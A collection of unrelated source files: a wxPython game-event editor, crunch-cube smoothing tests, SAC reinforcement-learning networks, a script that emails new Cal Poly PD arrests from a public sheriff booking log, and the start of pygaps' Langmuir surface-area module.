self.char_visible3.SetValue(self.event.characters_shown[3])
self.char_visible4.SetValue(self.event.characters_shown[4])
self.char_visible5.SetValue(self.event.characters_shown[5])
self.char_visible6.SetValue(self.event.characters_shown[6])
self.char_visible7.SetValue(self.event.characters_shown[7])
self.char_anim0.SetValue(self.event.characters_anim_index[0])
self.char_anim1.SetValue(self.event.characters_anim_index[1])
self.char_anim2.SetValue(self.event.characters_anim_index[2])
self.char_anim3.SetValue(self.event.characters_anim_index[3])
self.char_anim4.SetValue(self.event.characters_anim_index[4])
self.char_anim5.SetValue(self.event.characters_anim_index[5])
self.char_anim6.SetValue(self.event.characters_anim_index[6])
self.char_anim7.SetValue(self.event.characters_anim_index[7])
def get_event_info(self):
self.event.map_top_id = self.m_mapTopID.GetValue()
self.event.map_bottom_id = self.m_mapBtmID.GetValue()
self.event.characters[0] = self.char_id0.GetValue()
self.event.characters[1] = self.char_id1.GetValue()
self.event.characters[2] = self.char_id2.GetValue()
self.event.characters[3] = self.char_id3.GetValue()
self.event.characters[4] = self.char_id4.GetValue()
self.event.characters[5] = self.char_id5.GetValue()
self.event.characters[6] = self.char_id6.GetValue()
self.event.characters[7] = self.char_id7.GetValue()
self.event.characters_pos[0] = self.char_slot0.GetValue()
self.event.characters_pos[1] = self.char_slot1.GetValue()
self.event.characters_pos[2] = self.char_slot2.GetValue()
self.event.characters_pos[3] = self.char_slot3.GetValue()
self.event.characters_pos[4] = self.char_slot4.GetValue()
self.event.characters_pos[5] = self.char_slot5.GetValue()
self.event.characters_pos[6] = self.char_slot6.GetValue()
self.event.characters_pos[7] = self.char_slot7.GetValue()
self.event.characters_shown[0] = self.char_visible0.GetValue()
self.event.characters_shown[1] = self.char_visible1.GetValue()
self.event.characters_shown[2] = self.char_visible2.GetValue()
self.event.characters_shown[3] = self.char_visible3.GetValue()
self.event.characters_shown[4] = self.char_visible4.GetValue()
self.event.characters_shown[5] = self.char_visible5.GetValue()
self.event.characters_shown[6] = self.char_visible6.GetValue()
self.event.characters_shown[7] = self.char_visible7.GetValue()
self.event.characters_anim_index[0] = self.char_anim0.GetValue()
self.event.characters_anim_index[1] = self.char_anim1.GetValue()
self.event.characters_anim_index[2] = self.char_anim2.GetValue()
self.event.characters_anim_index[3] = self.char_anim3.GetValue()
self.event.characters_anim_index[4] = self.char_anim4.GetValue()
self.event.characters_anim_index[5] = self.char_anim5.GetValue()
self.event.characters_anim_index[6] = self.char_anim6.GetValue()
self.event.characters_anim_index[7] = self.char_anim7.GetValue()
def load_event(self, event: Event):
self.event = event
self.set_event_info()
self.command_panels.clear()
sizer: wx.Sizer = self.event_commands.GetSizer()
sizer.Clear(True)
for i, command in enumerate(self.event.event_gds.commands):
self.add_command_panel(CommandRepr.from_gds(command, self.event))
self.event_commands.Layout()
self.Layout()
def apply_changes(self, _):
sizer: wx.Sizer = self.event_commands.GetSizer()
self.get_event_info()
self.event.clear_event_texts()
command_panels = [child.GetWindow() for child in sizer.GetChildren()]
self.event.event_gds.commands.clear()
for command_panel in command_panels:
command_panel: CommandPanel
command_repr = command_panel.get_command_repr()
command = command_repr.to_gds(self.event)
self.event.event_gds.commands.append(command)
self.previewer.start_renderer(EventPlayer(self.event))
def save_changes(self, _event):
self.apply_changes(None)
self.event.save_to_rom()
def move_up(self, command_panel: CommandPanel):
sizer: wx.Sizer = self.event_commands.GetSizer()
for j, child in enumerate(sizer.GetChildren()):
child: wx.SizerItem
if child.GetWindow() == command_panel:
sizer.Detach(command_panel)
sizer.Insert(max(0, j - 1), command_panel, 0, wx.ALL | wx.EXPAND, 5)
break
command_panel.Layout()
for child in sizer.GetChildren():
child.GetWindow().Layout()
self.event_commands.Layout()
sizer.Layout()
def move_down(self, command_panel):
sizer: wx.Sizer = self.event_commands.GetSizer()
for j, child in enumerate(sizer.GetChildren()):
child: wx.SizerItem
if child.GetWindow() == command_panel:
sizer.Detach(command_panel)
sizer.Insert(min(len(sizer.GetChildren()), j + 1), command_panel, 0, wx.ALL | wx.EXPAND, 5)
break
command_panel.Layout()
for child in sizer.GetChildren():
child.GetWindow().Layout()
self.event_commands.Layout()
sizer.Layout()
def delete(self, command_panel):
sizer: wx.Sizer = self.event_commands.GetSizer()
for j, child in enumerate(sizer.GetChildren()):
child: wx.SizerItem
if child.GetWindow() == command_panel:
sizer.Remove(j)
command_panel.Destroy()
break
try:
command_panel.Layout()
except RuntimeError:
# wrapped C/C++ object of type CommandPanel has been deleted
pass
self.event_commands.Layout()
sizer.Layout()
def enter(self):
self.GetGrandParent().add_menu(self.menu, "Event")
def exit(self):
self.GetGrandParent().remove_menu("Event")
def add_dialogue(self, _):
self.add_command_panel(CommandRepr(
"Dialogue",
[["Text GDS Number", "uint", 0],
["Character ID", "uint", 0],
["Start Animation", "str", "NONE"],
["End Animation", "str", "NONE"],
["Sound Pitch?", "uint", 2],
["Text", "long_str", ""]]
))
def add_fade(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["fade"],
[["Fade In", "bool", False],
["Fade Screen", "uint", 0],
["Fade Frames", "int", -1]]
))
def add_bg_load(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["bg_load"],
[["Path", "str", ""],
["Screen", "uint", 0]]
))
def add_set_mode(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["set_mode"],
[["Mode", "str", ""]]
))
def add_set_next_mode(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["set_next_mode"],
[["Mode", "str", ""]]
))
def add_set_movie(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["set_movie"],
[["Movie ID", "uint", 0]]
))
def add_set_event(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["set_event"],
[["Event ID", "uint", 0]]
))
def add_set_puzzle(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["set_puzzle"],
[["Puzzle ID", "uint", 0]]
))
def add_set_room(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["set_room"],
[["Room ID", "uint", 0]]
))
def add_chr_show(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["chr_show"],
[["Character Index", "uint", 0]]
))
def add_chr_hide(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["chr_hide"],
[["Character Index", "uint", 0]]
))
def add_chr_visibility(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["chr_visibility"],
[["Character Index", "uint", 0],
["Visibility", "bool", False]]
))
def add_chr_slot(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["chr_slot"],
[["Character Index", "uint", 0],
["Slot", "int", 0]]
))
def add_chr_anim(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["chr_anim"],
[["Character ID", "uint", 0],
["Animation", "str", "NONE"]]
))
def add_show_chapter(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["show_chapter"],
[["Chapter Number", "uint", 0]]
))
def add_wait(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["wait"],
[["Wait Frames", "uint", 180]]
))
def add_bg_opacity(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["bg_opacity"],
[["unk0", "uint", 0],
["unk1", "uint", 0],
["unk2", "uint", 0],
["Opacity", "uint", 120]]
))
def add_set_voice(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["set_voice"],
[["Voice ID", "uint", 0]]
))
def add_sfx_sad(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["sfx_sad"],
[["SFX ID", "uint", 0]]
))
def add_bg_music(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["bg_music"],
[["Music ID", "uint", 0],
["Volume", "float", 1.0],
["unk2", "uint", 0]]
))
def add_bg_shake(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["bg_shake"],
[["unk0", "uint", 30]]
))
def add_sfx_sed(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["sfx_sed"],
[["SFX ID", "uint", 0]]
))
def add_btm_fade_out(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["bgm_fade_out"],
[["unk0", "float", 0],
["unk1", "uint", 320]]
))
def add_btm_fade_in(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["bgm_fade_in"],
[["unk0", "float", 1.0],
["unk1", "uint", 320]]
))
def add_dialogue_sfx(self, _):
self.add_command_panel(CommandRepr(
self.event.func_names["dialogue_sfx"],
[["SAD SFX ID", "uint", 0],
["unk1", "float", 0.0],
["unk2", "uint", 0],
["unk2", "uint", 0]]
))
|
<reponame>Crunch-io/crunch-cube<filename>tests/integration/test_smoothing.py
# encoding: utf-8
"""Integration-test suite for smoothing feature."""
import numpy as np
import pytest
from cr.cube.cube import Cube
from ..fixtures import CR, NA
from ..util import load_python_expression
class DescribeSliceSmoothing:
"""Integration-test suite for _Slice.evaluate() method."""
@pytest.mark.parametrize(
"fixture, window, expectation",
(
(CR.CAT_X_CAT_DATE_WGTD, 4, "cat-x-cat-date-wgtd-smoothed-col-idx-w4"),
(CR.CAT_X_MR_X_CAT_DATE, 3, "cat-x-mr-x-cat-date-smoothed-col-idx-w3"),
(
CR.CA_SUBVAR_X_CA_CAT_X_CAT_DATE,
3,
"ca-subvar-x-ca-cat-cat-date-smoothed-col-idx-w3",
),
(CR.CAT_HS_X_CAT_DATE, 3, "cat-hs-x-cat-date-smoothed-col-idx-w3"),
(CR.MR_X_CAT_DATE, 3, "mr-x-cat-date-smoothed-col-idx-w3"),
(CR.NUMERIC_X_CAT_DATE, 3, "numeric-x-cat-date-smoothed-col-idx-w3"),
(CR.TXT_X_CAT_DATE, 3, "txt-x-cat-date-smoothed-col-idx-w3"),
(CR.DATETIME_X_CAT_DATE, 3, "datetime-x-cat-date-smoothed-col-idx-w3"),
),
)
def it_provides_smoothed_col_index_for_compatible_cubes(
self, fixture, window, expectation
):
transforms = {
"columns_dimension": {
"smoother": {
"function": "one_sided_moving_avg",
"window": window,
}
}
}
slice_ = Cube(fixture, transforms=transforms).partitions[0]
np.testing.assert_array_almost_equal(
slice_.smoothed_column_index, load_python_expression(expectation)
)
@pytest.mark.parametrize(
"fixture, window, expectation",
(
(CR.CAT_X_CAT_DATE_WGTD, 4, "cat-x-cat-date-wgtd-smoothed-col-pct-w4"),
(CR.CAT_X_MR_X_CAT_DATE, 3, "cat-x-mr-x-cat-date-smoothed-col-pct-w3"),
(
CR.CA_SUBVAR_X_CA_CAT_X_CAT_DATE,
3,
"ca-subvar-x-ca-cat-cat-date-smoothed-col-pct-w3",
),
(CR.CAT_HS_X_CAT_DATE, 3, "cat-hs-x-cat-date-smoothed-col-pct-w3"),
(CR.MR_X_CAT_DATE, 3, "mr-x-cat-date-smoothed-col-pct-w3"),
(CR.NUMERIC_X_CAT_DATE, 3, "numeric-x-cat-date-smoothed-col-pct-w3"),
(CR.TXT_X_CAT_DATE, 3, "txt-x-cat-date-smoothed-col-pct-w3"),
(CR.DATETIME_X_CAT_DATE, 3, "datetime-x-cat-date-smoothed-col-pct-w3"),
),
)
def it_provides_smoothed_col_percent_for_compatible_cubes(
self, fixture, window, expectation
):
transforms = {
"columns_dimension": {
"smoother": {
"function": "one_sided_moving_avg",
"window": window,
}
}
}
slice_ = Cube(fixture, transforms=transforms).partitions[0]
np.testing.assert_array_almost_equal(
slice_.smoothed_column_percentages, load_python_expression(expectation)
)
@pytest.mark.parametrize(
"fixture, expectation",
(
(CR.CAT_X_CAT_DATE, "cat-x-cat-date-smoothed-scale-means-w2"),
(CR.CAT_X_CAT_DATE_WGTD, "cat-x-cat-date-smoothed-scale-means-w2"),
(
CR.CA_SUBVAR_X_CA_CAT_X_CAT_DATE,
"ca-subvar-ca-cat-x-cat-date-scale-means-w2",
),
),
)
def it_provides_smoothed_scale_means_for_compatible_cubes(
self, fixture, expectation
):
transforms = {
"columns_dimension": {
"smoother": {
"function": "one_sided_moving_avg",
"window": 2,
}
}
}
slice_ = Cube(fixture, transforms=transforms).partitions[0]
# --- window not expressed get the default value : 2
np.testing.assert_array_almost_equal(
slice_.smoothed_columns_scale_mean, load_python_expression(expectation)
)
def it_provides_smoothed_means_for_numeric_array(self):
transforms = {
"columns_dimension": {
"smoother": {
"function": "one_sided_moving_avg",
"window": 2,
}
}
}
slice_ = Cube(
NA.NUM_ARR_MEANS_GROUPED_BY_CAT_DATE, transforms=transforms
).partitions[0]
expectation = np.array(
load_python_expression("num-array-means-grouped-by-cat-date-smoothed")
)
assert slice_.smoothed_means == pytest.approx(expectation, nan_ok=True)
@pytest.mark.parametrize(
"fixture",
(CR.CAT_X_MR, CR.MR_X_MR, CR.MR_X_CA_CAT_X_CA_SUBVAR, CR.CAT_DATE_X_CAT),
)
def it_warns_and_does_not_smooth_when_dimension_is_not_smoothable(self, fixture):
transforms = {
"columns_dimension": {
"smoother": {
"function": "one_sided_moving_avg",
"window": 3,
}
}
}
slice_ = Cube(fixture, transforms=transforms).partitions[0]
expected_warning_regex = (
r"No smoothing performed. Column dimension must be a categorical date."
)
with pytest.warns(UserWarning, match=expected_warning_regex):
smoothed_values = slice_.smoothed_column_percentages
slice_ = Cube(fixture).partitions[0]
base_values = slice_.column_percentages
assert smoothed_values.tolist() == base_values.tolist()
@pytest.mark.parametrize(
"fixture, smoothed_prop_name, prop_name, periods, window",
(
(
CR.CAT_X_CAT_DATE,
"smoothed_column_percentages",
"smoothed_column_percentages",
4,
1,
),
(CR.CAT_X_CAT_DATE, "smoothed_column_index", "column_index", 4, 1),
(
CR.CAT_X_CAT_DATE,
"smoothed_columns_scale_mean",
"columns_scale_mean",
4,
1,
),
),
)
def it_warns_and_does_not_smooth_when_window_is_invalid(
self, fixture, smoothed_prop_name, prop_name, periods, window
):
transforms = {
"columns_dimension": {
"smoother": {
"function": "one_sided_moving_avg",
"window": window,
}
}
}
slice_ = Cube(fixture, transforms=transforms).partitions[0]
expected_warning_regex = (
r"No smoothing performed. Smoothing window must be between 2 and the "
r"number of periods \(%d\), got %d" % (periods, window)
)
with pytest.warns(UserWarning, match=expected_warning_regex):
smoothed_values = getattr(slice_, smoothed_prop_name)
base_values = getattr(slice_, prop_name)
np.testing.assert_array_almost_equal(smoothed_values, base_values)
def it_uses_default_smoothing_if_smoother_is_not_specified(self):
slice_ = Cube(CR.CAT_X_CAT_DATE).partitions[0]
assert slice_.smoothed_column_percentages == pytest.approx(
np.array(
[
[np.nan, 28.4013529661, 30.877106856, 35.7038771792],
[np.nan, 42.5027849229, 47.5045000818, 47.491543065],
[np.nan, 13.8136228302, 13.0829651448, 11.170960187],
[np.nan, 5.12648613614, 3.74406807396, 1.54306531355],
[np.nan, 10.1557531444, 4.7913598429, 4.0905542544],
]
),
nan_ok=True,
)
class DescribeStrandMeansSmoothing:
"""Integration-test suite for _Strand method."""
def it_provides_smoothed_means_cat_date(self):
transforms = {
"rows_dimension": {
"smoother": {"function": "one_sided_moving_avg", "window": 3}
}
}
strand_ = Cube(CR.CAT_DATE_MEAN, transforms=transforms).partitions[0]
np.testing.assert_array_almost_equal(
strand_.smoothed_means,
[np.nan, np.nan, 2.65670765025029, 2.5774816240050358],
)
def it_does_not_smooth_means_mr_mean_filt_wgtd(self):
transforms = {
"rows_dimension": {
"smoother": {"function": "one_sided_moving_avg", "window": 3}
}
}
strand_ = Cube(CR.MR_MEAN_FILT_WGTD, transforms=transforms).partitions[0]
expected_warning_regex = (
r"No smoothing performed. Row dimension must be a categorical date."
)
with pytest.warns(UserWarning, match=expected_warning_regex):
means = strand_.smoothed_means
assert means == pytest.approx([3.724051, 2.578429, 2.218593, 1.865335])
|
<gh_stars>1-10
import numpy as np
import torch
import torch.nn as nn
from SRL4RL.utils.nn_torch import MLP_mdn, MLP_Module, import_weight_init, pytorch2numpy
from SRL4RL.utils.utils import get_hidden
class QNetwork(nn.Module):
def __init__(self, env_params, config):
super(QNetwork, self).__init__()
self.method = config["method"]
nb_hidden = get_hidden(config["nb_hidden"])
print("nb_hidden critic:", nb_hidden)
"Q1 & Q2 architectures"
nb_layer = len(nb_hidden)
if nb_layer > 1:
assert not config["linearApprox"], "linearApprox with multiple nb_hidden!"
activation = config["activation"]
elif nb_layer == 1:
if config["linearApprox"]:
activation = None # to make a linear policy network
else:
activation = config["activation"]
nb_hidden += [1]
input_dim = env_params["obs"][0] + env_params["goal"] + env_params["action"]
self.q1_network = MLP_Module(
input_dim, nb_hidden, activation=activation, name="Q1"
)
self.q2_network = MLP_Module(
input_dim, nb_hidden, activation=activation, name="Q2"
)
if config["weight_init"] != "none":
weight_init_ = import_weight_init(config["weight_init"])
self.q1_network.apply(weight_init_)
self.q2_network.apply(weight_init_)
def forward(self, action_, x, goal=None):
if goal is not None:
x = torch.cat([x, goal], dim=1)
xu = torch.cat([x, action_], 1)
x1 = self.q1_network(xu)
x2 = self.q2_network(xu)
return x1, x2
def gaussian_logprob(noise, log_sig):
"""Compute Gaussian log probability."""
residual = (-0.5 * noise.pow(2) - log_sig).sum(-1, keepdim=True)
return residual - 0.5 * np.log(2 * np.pi) * noise.size(-1)
def sampleNormal(mu, sig):
noise = torch.randn_like(mu)
return mu + noise * sig, noise
class GaussianPolicy(nn.Module):
def __init__(self, env_params, config):
super(GaussianPolicy, self).__init__()
self.method = config["method"]
self.log_sig_min = -10
self.log_sig_max = 2
nb_hidden = get_hidden(config["nb_hidden"])
nb_layer = len(nb_hidden)
assert config["cutoff"] < nb_layer, "not enoug layers for cutoff"
print("nb_hidden actor: {}, cutoff: {}".format(nb_hidden, config["cutoff"]))
if nb_layer > 1:
assert not config["linearApprox"], "linearApprox with multiple nb_hidden!"
elif nb_layer == 1:
if config["linearApprox"]:
with_last_actv = False # to make a linear policy network
else:
with_last_actv = True
input_dim = env_params["obs"][0] + env_params["goal"]
if config["cutoff"] > 0:
self.pi_network, self.mean_linear, self.log_sig_linear, _ = MLP_mdn(
input_dim,
nb_hidden + [env_params["action"]],
cutoff=config["cutoff"],
activation=config["activation"],
)
else:
self.pi_network = MLP_Module(
input_dim,
nb_hidden,
activation=config["activation"],
with_last_actv=with_last_actv,
name="Pi",
)
self.mean_linear = nn.Linear(nb_hidden[-1], env_params["action"])
self.log_sig_linear = nn.Linear(nb_hidden[-1], env_params["action"])
if config["weight_init"] != "none":
weight_init_ = import_weight_init(config["weight_init"])
self.pi_network.apply(weight_init_)
self.action_scale = torch.tensor(
(env_params["action_max"] - env_params["action_min"]) / 2.0
)
self.action_bias = torch.tensor(
(env_params["action_max"] + env_params["action_min"]) / 2.0
)
def forward(self, x, oneHot, goal=None):
if goal is not None:
x = torch.cat([x, goal], dim=1)
x = self.pi_network(x)
mean = self.mean_linear(x)
log_sig = self.log_sig_linear(x)
log_sig = torch.clamp(log_sig, min=self.log_sig_min, max=self.log_sig_max)
assert not torch.isnan(mean).any().item(), "isnan in mean!!"
assert not torch.isnan(log_sig).any().item(), "isnan in log_sig!!"
return mean, log_sig
def normalizePi(self, mu, pi, log_pi):
"""Apply squashing function.
See appendix C from https://arxiv.org/pdf/1812.05905.pdf
"""
mu = torch.tanh(mu) * self.action_scale + self.action_bias
pi = torch.tanh(pi)
epsilon = 1e-6 # Avoid NaN (prevents division by zero or log of zero)
log_pi -= torch.log(self.action_scale * (1 - pi.pow(2)) + epsilon).sum(
-1, keepdim=True
)
pi = pi * self.action_scale + self.action_bias
return mu, pi, log_pi
def sample(self, state, oneHot=False, goal=None):
mu, log_sig = self.forward(state, oneHot=oneHot, goal=goal)
sig = log_sig.exp()
# for repameterization trick (mu + sig * N(0,1))
# Pre-squash distribution and sample
x_t, noise = sampleNormal(mu=mu, sig=sig)
log_pi = gaussian_logprob(noise, log_sig)
mu, pi, log_pi = self.normalizePi(mu, x_t, log_pi)
# Deterministic action
assert not torch.isnan(pi).any().item(), "isnan in pi!!"
return pi, log_pi, mu
def select_actions(self, state, evaluate=False, goal=None):
if evaluate:
_, _, pi = self.sample(state, goal=goal)
else:
pi, _, _ = self.sample(state, goal=goal)
# return action.detach().cpu().numpy()[0]
return pytorch2numpy(pi).squeeze(axis=0)
|
import requests
import os.path
import pickle
import pyzmail
import subprocess
from bs4 import BeautifulSoup
# Shout-out to the very helpful Sergeant <NAME> of the SLO County Sheriff's Office for
# his help decoding the agency codes.
AGENCIES = {
"AGPD": "Arroyo Grande PD",
"ASHP": "??",
"ATPD": "Atascadero PD",
"BAIL": "??Court Bailiffs?",
"CAPO": "California Department of Parks and Recreation: Oceano",
"CAPR": "California Department of Parks and Recreation: San Luis Obispo",
"CHPD": "CHP Coastal Division Headquarters",
"CHPS": "CHP San Luis Obispo",
"CHPT": "CHP Templeton",
"CMC": "??",
"COURT":"??",
"CPPD": "Cal Poly University PD",
"DA": "District Attorney",
"GBPD": "Grover Beach PD",
"MBPD": "Morro Bay PD",
"OTHR": "Other Agency",
"PBPD": "Pismo Beach PD",
"PROB": "SLO Probation Officers",
"PRPD": "Paso Robles PD",
"SLPD": "San Luis Obispo PD",
"SLSO": "San Luis Obispo County Sheriff's Office",
"SPAR": "??",
}
CHARGES = {
# California Business & Professional Code
"25661(A) BP": "Minor in Possession of a False ID",
"25662(A) BP": "Minor in Possession",
# California Health & Safety Code
"11350 HS": "Possession of a Controlled Substance",
"11357(B) HS": "Possession of <1 oz Marijuana",
"11364(A) HS": "Possession of Paraphernalia",
"11377(A) HS": "Misdemeanor - Possession of a Controlled Substance",
"11550 HS": "Use/Under Influence of Controlled Substance",
"11550(A) HS": "Under the Influence of a Controlled Substance",
# California Penal Code
"69 PC": "Resisting an Officer",
"148(A) PC": "Obstructs/Resists Public Officer, etc.",
"148(A)(1) PC": "Resisting Arrest/Obstruction of Justice",
"148.9(A) PC": "False Identification to Peace Officer",
"166(C)(4) PC": "Violation of Protective Order w/Prior",
"186.22(A) PC": "FELONY - PARTICIPATE IN CRIMINAL STREET GANG",
"243(B) PC": "BATTERY ON PEACE OFFICER/EMERGENCY PERSONNEL/ETC",
"243(D) PC": "Battery w/Serious Injury",
"245(A)(1) PC": "FELONY - ASSAULT W/DEADLY WEAPON OTHER THAN FIREARM OR GBI",
"272(A)(1) PC": "Contribute to the Deliquency of a Minor",
"273.5 PC": "INFLICT CORPORAL INJURY ON SPOUSE/COHABITANT",
"290.011(A) PC": "Failure to Register as a Sex Offender",
"311.11(A) PC": "OBS - POSSESS/ETC MATTER DEPICTING MINOR UNDER 14 IN SEX",
"368(B)(1) PC": "Felony Elder Abuse w/GBI",
"459 PC": "Burglary",
"484(A) PC": "Petty Theft/Larceny",
"496D(A) PC": "FELONY - VEH/TRAILER CONST EQUIP KNOWN TO BE STOLEN",
"537E(A) PC": "MISDEMEANOR - BUY/SELL ARTICLES WITH IDENTIFICATION REMOVED",
"647(F) PC": "Drunk in Public",
"664/211 PC": "Attempted Robbery",
"853.8 PC": "Failure to Appear (Promise to Appear)",
"978.5 PC": "Felony Failure to Appear (Bench Warrant)",
"1203.2 PC": "Violation of Probation",
"1203.2(A) PC": "Revocation of Probation Rearrest",
"3056 PC": "Violation of Parole",
"3455(A) PC": "Violation of Post Release Supervision",
"3455(B)(1) PC": "Violation of Post Release Community Supervision",
"4573 PC": "Bringing Narcotics to a Prisoner",
"4574(A) PC": "WEAPON/TEAR GAS OFFENSE:PRISON/JAIL/ETC",
"29800(A)(1) PC": "Felon in Possession of a Firearm",
# California Vehicle Code
"5200 VC": "Display of License Plates",
"10851(A) VC": "FELONY - AUTO THEFT, PERMNNTLY/TEMP DEPRIVE OWNER OF POSS",
"12500(A) VC": "Driving w/o a License",
"14601.1(A) VC": "Driving w/Suspended License",
"14601.2(A) VC": "Driving w/Suspended License, Under The Influence related",
"20002(A) VC": "HIT-RUN, PROPERTY DAMAGE, INCLUDING VEHICLES",
"22450 VC": "Failure to Stop at a Stop Sign",
"23152 VC": "DUI (general)",
"23152(A) VC": "DUI (alcohol)",
"23152(B) VC": "DUI, >0.08 BAC",
"23152(E) VC": "DUI (drug), first offense",
"23224(A) VC": "Minor Driving w/Alcohol",
"22349(A) VC": "Exceeding the Posted Speed Limit",
"40515 VC": "Failure to Appear wrt Promise to Appear/Continuance",
}
SUBSCRIBERS = {}
with open("subscribers", "r") as subscribers:
while True:
line = subscribers.readline()
if not line: break
name, email = line.strip().split(": ")
SUBSCRIBERS[name] = email
logData = requests.get("http://www.slosheriff.org/WebLogs/BookingLog/Data/WebBookingLog.xml").text
tree = BeautifulSoup(logData, "lxml-xml")
if not os.path.isfile("previous_bookings"):
# Skip unpickling the old set and just establish an empty one
previousBookings = set()
else:
# Unpickle the old bookings.
pbfile = open("previous_bookings", "r")
previousBookings = pickle.load(pbfile)
pbfile.close()
updCharges = tree.findAll(Agency="CPPD")
newBookings = []
for charge in updCharges:
# Is this a known booking, or a novel booking?
bookingNo = charge.parent.get("bookingNo")
if bookingNo in previousBookings:
# Seen it.
continue
# So we've got a new charge, at least.
# Add it to the newBookings list if it's not already there.
# I could use a set, but this way we keep the order intact from the booking log,
# which is already sorted.
if charge.parent not in newBookings:
newBookings += [charge.parent]
notifyList = []
newCharges = set()
for booking in newBookings:
# Process each newBooking into an ASCII summary for the notif email.
str = booking.get("date") + "\n"
str += "%s - %s y/o %s, DOB %s\n" % (booking.get("name"), booking.get("age"), booking.get("sex"), booking.get("dob"))
str += "--> Charged with:\n"
for charge in booking.findAll("Charge"):
code = charge.get("ViolationCode")
if code not in CHARGES:
newCharges.add(code)
str += " * %s (%s)\n" % (CHARGES.get(code, "Unknown"), code)
if booking.ScheduledEvent:
type = booking.ScheduledEvent.get("type")
# Make the caps work on the event type.
type = type[0] + type[1:].lower()
str += "%s Date: %s\n" % (type, booking.ScheduledEvent.get("date"))
notifyList += [str]
if newCharges:
str = "New Charges: " + ", ".join(newCharges)
notifyList += [str]
if not notifyList:
# Nothing new today. Don't bother people with an email.
print "Nothing new."
exit(0)
if len(SUBSCRIBERS) == 0:
print "\n\n".join(notifyList)
exit(0)
# Make a datestamp using /bin/date. Sue me :)
binDate = subprocess.Popen(['date', '+%m/%d/%Y'], stdout=subprocess.PIPE)
datestamp, _ = binDate.communicate()
sender = ('UPD Bot', '<EMAIL>')
recipients = SUBSCRIBERS.items()
subject = u'UPD Booking Log for %s' % datestamp.strip()
text_content = "\n\n".join(notifyList)
prefered_encoding='iso-8859-1'
text_encoding='iso-8859-1'
payload, mail_from, rcpt_to, msg_id=pyzmail.compose_mail(
sender,
recipients,
subject,
prefered_encoding,
(text_content, text_encoding))
smtp_host = "email-smtp.us-east-1.amazonaws.com"
smtp_port = 587
smtp_mode = "tls"
with open("aws_credentials", "r") as creds:
smtp_login, smtp_password = creds.read().strip().split(":")
ret = pyzmail.send_mail(payload, mail_from, rcpt_to, smtp_host,
smtp_port=smtp_port, smtp_mode=smtp_mode,
smtp_login=smtp_login, smtp_password=smtp_password)
if ret == {}:
print "All good."
else:
print "Some kind of error: " + ret
# Exit now, because we failed to actually send people the updates
# for the new bookings.
exit(1)
# Finally, time to update the previous bookings set.
for booking in newBookings:
previousBookings.add(booking.get("bookingNo"))
pbfile = open("previous_bookings", "w")
pickle.dump(previousBookings, pbfile)
pbfile.close()
|
<filename>src/pygaps/characterisation/area_lang.py
"""This module contains Langmuir area calculations."""
import textwrap
import numpy
from scipy import constants
from scipy import stats
from pygaps import logger
from pygaps.core.adsorbate import Adsorbate
from pygaps.core.modelisotherm import ModelIsotherm
from pygaps.core.pointisotherm import PointIsotherm
from pygaps.utilities.exceptions import CalculationError
from pygaps.utilities.exceptions import ParameterError
from pygaps.utilities.exceptions import pgError
def area_langmuir(
isotherm: "PointIsotherm | ModelIsotherm",
branch: str = 'ads',
p_limits: "tuple[float, float]" = None,
verbose: bool = False,
):
r"""
Calculate the Langmuir area of an isotherm.
The optional ``p_limits`` parameter allows to specify the upper and lower
pressure limits to calculate the Langmuir area, otherwise the limits will be
automatically set to 5-90% of isotherm pressure range.
Parameters
----------
isotherm : PointIsotherm, ModelIsotherm
The isotherm of which to calculate the Langmuir surface area.
branch : {'ads', 'des'}, optional
Branch of the isotherm to use. It defaults to adsorption.
p_limits : tuple[float, float], optional
Pressure range in which to perform the calculation.
verbose : bool, optional
Prints extra information and plots graphs of the calculation.
Returns
-------
dict
A dictionary of results with the following components. The basis of these
results will be derived from the basis of the isotherm (per mass, per
volume, or per mole of adsorbent):
- ``area`` (float) : calculated Langmuir surface area, in m2/unit of material
- ``langmuir_const`` (float) : the constant in the Langmuir fit
- ``n_monolayer`` (float) : the amount adsorbed at the monolayer
- ``langmuir_slope`` (float) : slope of the Langmuir plot
- ``langmuir_intercept`` (float) : intercept of the Langmuir plot
- ``corr_coef`` (float) : correlation coefficient of the linear region in the Langmuir plot
Raises
------
ParameterError
When something is wrong with the function parameters.
CalculationError
When the calculation itself fails.
Notes
-----
*Description*
The Langmuir theory [#]_, proposed at the start of the 20th century, states
that adsorption happens on individual active sites on a surface in a single
layer. It is derived based on several assumptions.
* All sites are equivalent and have the same chance of being occupied.
* Each adsorbate molecule can occupy one adsorption site.
* There are no interactions between adsorbed molecules.
* The rates of adsorption and desorption are proportional to the number of
sites currently free and currently occupied, respectively.
* Adsorption is complete when all sites are filled.
The Langmuir equation is then:
.. math::
n = n_m\frac{KP}{1+KP}
The equation can be rearranged as:
.. math::
\frac{P}{n} = \frac{1}{K n_m} + \frac{P}{n_m}
Assuming the data can be fitted with a Langmuir model, by plotting
:math:`\frac{P}{n}` against pressure, a line will be obtained. The slope and
intercept of this line can then be used to calculate :math:`n_{m}`,
the amount adsorbed at the monolayer, as well as K, the Langmuir constant.
.. math::
n_m = \frac{1}{s}
K = \frac{1}{i * n_m}
The surface area can then be calculated by using the moles adsorbed at the
monolayer. If the specific area taken by one of the adsorbate molecules on the surface
is known, it is inserted in the following equation together with Avogadro's number:
.. math::
a(Langmuir) = n_m A_N \sigma
*Limitations*
The Langmuir method for determining surface area assumes that only one single
layer is adsorbed on the surface of the material. As most adsorption processes
